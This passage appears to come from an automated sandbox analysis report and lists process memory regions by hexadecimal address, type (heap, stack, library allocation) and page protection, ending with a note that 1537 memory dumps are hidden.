stack
|
page read and write
|
||
|
260B00B5000
|
heap
|
page read and write
|
||
|
7FF848C43000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CE5B30000
|
heap
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E1A000
|
trusted library allocation
|
page read and write
|
||
|
260B1B20000
|
heap
|
page read and write
|
||
|
1C40DA90000
|
trusted library allocation
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
24CE5AF0000
|
heap
|
page read and write
|
||
|
21E33C5D000
|
trusted library allocation
|
page read and write
|
||
|
260C1B61000
|
trusted library allocation
|
page read and write
|
||
|
21E248CA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
260AFE90000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
11E0000
|
heap
|
page read and write
|
||
|
286BD5E0000
|
heap
|
page read and write
|
||
|
1C426520000
|
heap
|
page execute and read and write
|
||
|
1C7303C0000
|
heap
|
page read and write
|
||
|
21E247A1000
|
trusted library allocation
|
page read and write
|
||
|
210306F0000
|
heap
|
page read and write
|
||
|
1C718C25000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D40000
|
heap
|
page read and write
|
||
|
12FC35BA000
|
heap
|
page read and write
|
||
|
7FF848E01000
|
trusted library allocation
|
page read and write
|
||
|
12D0000
|
heap
|
page read and write
|
||
|
24FCCDCC000
|
heap
|
page read and write
|
||
|
1C71618E000
|
heap
|
page read and write
|
||
|
286BD706000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFA000
|
trusted library allocation
|
page read and write
|
||
|
260CA29C000
|
heap
|
page read and write
|
||
|
7FF848DDA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
|
1250000
|
heap
|
page read and write
|
||
|
1C7301A6000
|
heap
|
page read and write
|
||
|
24FB2F64000
|
heap
|
page read and write
|
||
|
48A1CFF000
|
stack
|
page read and write
|
||
|
15046209000
|
trusted library allocation
|
page read and write
|
||
|
12FC3460000
|
heap
|
page read and write
|
||
|
24CE5B02000
|
heap
|
page read and write
|
||
|
7FF848DC2000
|
trusted library allocation
|
page read and write
|
||
|
21E23BE1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
1C718C29000
|
trusted library allocation
|
page read and write
|
||
|
24CE3CE0000
|
heap
|
page read and write
|
||
|
21E3BD98000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
1C730390000
|
heap
|
page execute and read and write
|
||
|
21E24795000
|
trusted library allocation
|
page read and write
|
||
|
1C717BA0000
|
trusted library allocation
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
1C40C1C0000
|
heap
|
page read and write
|
||
|
F96F87E000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
1C40ED4C000
|
trusted library allocation
|
page read and write
|
||
|
1504E320000
|
heap
|
page read and write
|
||
|
21E240DC000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
260B1C6B000
|
trusted library allocation
|
page read and write
|
||
|
24FB60C5000
|
trusted library allocation
|
page read and write
|
||
|
21E23BD0000
|
heap
|
page read and write
|
||
|
7FF848CE6000
|
trusted library allocation
|
page read and write
|
||
|
260CA290000
|
heap
|
page read and write
|
||
|
24FB2E33000
|
heap
|
page read and write
|
||
|
F96F5FE000
|
stack
|
page read and write
|
||
|
150371B6000
|
trusted library allocation
|
page read and write
|
||
|
21E23790000
|
heap
|
page readonly
|
||
|
1504E802000
|
heap
|
page read and write
|
||
|
21E2480C000
|
trusted library allocation
|
page read and write
|
||
|
210306B4000
|
heap
|
page read and write
|
||
|
41A0000
|
heap
|
page read and write
|
||
|
7FF848CF6000
|
trusted library allocation
|
page read and write
|
There are 1537 hidden memdumps, click here to show them.